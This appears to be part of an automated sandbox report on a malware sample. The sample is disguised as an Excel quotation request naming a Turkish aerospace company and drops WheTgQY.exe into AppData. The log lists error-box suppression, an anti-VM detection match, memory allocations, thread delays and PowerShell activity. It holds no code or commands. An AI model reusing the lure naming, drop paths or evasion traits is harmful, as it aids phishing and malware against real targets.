Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: 10A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: 2B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: 4B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: 8F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: 9F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: A150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: B150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: B8D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: C8D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: D8D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory allocated: 1680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory allocated: 9080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory allocated: 7910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory allocated: A080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory allocated: B080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory allocated: B8E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory allocated: C8E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: 1110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: 2A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Memory allocated: 4A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory allocated: DA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory allocated: 27F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Memory allocated: 47F0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239883	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239765	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239651	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239546	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239435	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239328	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239219	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239109	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239000	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 238883	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 238688	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 238463	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 238156	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 237989	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 237859	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 237664	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239812	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239702	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239589	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239247	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239137	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 238992	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 238504	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 238384	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 238278	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 238170	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 238047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 237935	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599560	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597465	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596575	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596030	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595042	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599773
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599231
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598903
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598576
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598031
